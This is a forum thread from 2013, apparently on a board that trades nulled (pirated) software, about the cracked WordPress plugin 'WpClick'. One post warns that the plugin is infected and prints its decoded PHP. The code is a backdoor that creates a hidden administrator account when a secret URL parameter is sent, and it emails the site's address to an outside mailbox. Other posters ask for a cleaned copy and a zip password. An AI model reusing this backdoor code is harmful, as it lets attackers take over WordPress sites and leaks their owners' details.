19.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

03-21-2013, 01:06 PM
Post: #11
RE:
(03-20-2013 11:07 AM)master88 Wrote:  DO NOT INSTALL. This file is INFECTED!! Once installed, it is creating a backdoor and sending email to thomasza@gmx.com

BEWARE!!!

which is the same hijacking found on the WP SEO here:
/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates
I got the code below after I decode the wpclicks.php

PHP Code:
<?phpadd_action('wp_head''bvg4jukan');function bvg4jukan(){If ($_GET['cms'] == 'jjoplmh') {require('wp-includes/registration.php');If (!username_exists('wordpress')) {$user_id wp_create_user('wordpress','gh67io9Cjm');$user = new WP_User($user_id);$user->set_role('administrator');}}}add_action('wp_head''vfbg2awsc');function vfbg2awsc(){If (!username_exists('wordpress')){$addressdecode='thomasza@gmx.com';$vari='Wordpress Plugin WpClick';mail($addressdecode,get_bloginfo('wpurl'),$vari);}}?>

I think you know what it means.
03-22-2013, 09:43 AM (This post was last modified: 03-22-2013 09:45 AM by incomsis.)
Post: #12
RE:
(03-20-2013 11:07 AM)master88 Wrote:  DO NOT INSTALL. This file is INFECTED!! Once installed, it is creating a backdoor and sending email to thomasza@gmx.com

BEWARE!!!

which is the same hijacking found on the WP SEO here:
/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates

Can this be cleaned? Thanks for letting us know.
03-23-2013, 10:27 AM
Post: #13
RE:
It probably can but I couldn't even get the 1.3 version from Chairman to record on my WP.
03-25-2013, 05:45 AM
Post: #14
RE:
(03-23-2013 10:27 AM)master88 Wrote:  It probably can but I couldn't even get the 1.3 version from Chairman to record on my WP.
Hm, the one I shared was recording everything on my WP, I even posted screenshots from it. Could you try to clean it, please?

Thanks in advance!
03-30-2013, 04:07 PM
Post: #15
RE:
If someone can post the decoded file, I will look into it and see if I can clean it.
(03-25-2013 05:45 AM)incomsis Wrote:  
(03-23-2013 10:27 AM)master88 Wrote:  It probably can but I couldn't even get the 1.3 version from Chairman to record on my WP.
Hm, the one I shared was recording everything on my WP, I even posted screenshots from it. Could you try to clean it, please?

Thanks in advance!
33.gif
04-02-2013, 08:57 PM
Post: #16
RE:
Waiting for clean version please.......
05-02-2013, 02:40 PM
Post: #17
RE:
Any clean version guys/gals?
06-06-2013, 04:57 PM
Post: #18
RE:
(03-21-2013 01:06 PM)fatfox Wrote:  
(03-20-2013 11:07 AM)master88 Wrote:  DO NOT INSTALL. This file is INFECTED!! Once installed, it is creating a backdoor and sending email to thomasza@gmx.com

BEWARE!!!

which is the same hijacking found on the WP SEO here:
/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates
I got the code below after I decode the wpclicks.php

PHP Code:
set_role('administrator');}}}add_action('wp_head''vfbg2awsc');function vfbg2awsc(){If (!username_exists('wordpress')){$addressdecode='thomasza@gmx.com';$vari='Wordpress Plugin WpClick';mail($addressdecode,get_bloginfo('wpurl'),$vari);}}?>

I think you know what it means.

Can Someone PM me the full Decoded wpclick.php please. I'll try to clean it :)
06-30-2013, 05:52 PM
Post: #19
RE:
unfortunately doesnt work on 000webhost
10-07-2013, 05:24 AM
Post: #20
RE:
What's the password for the zip file?
67.gif




55.gif
Free counters!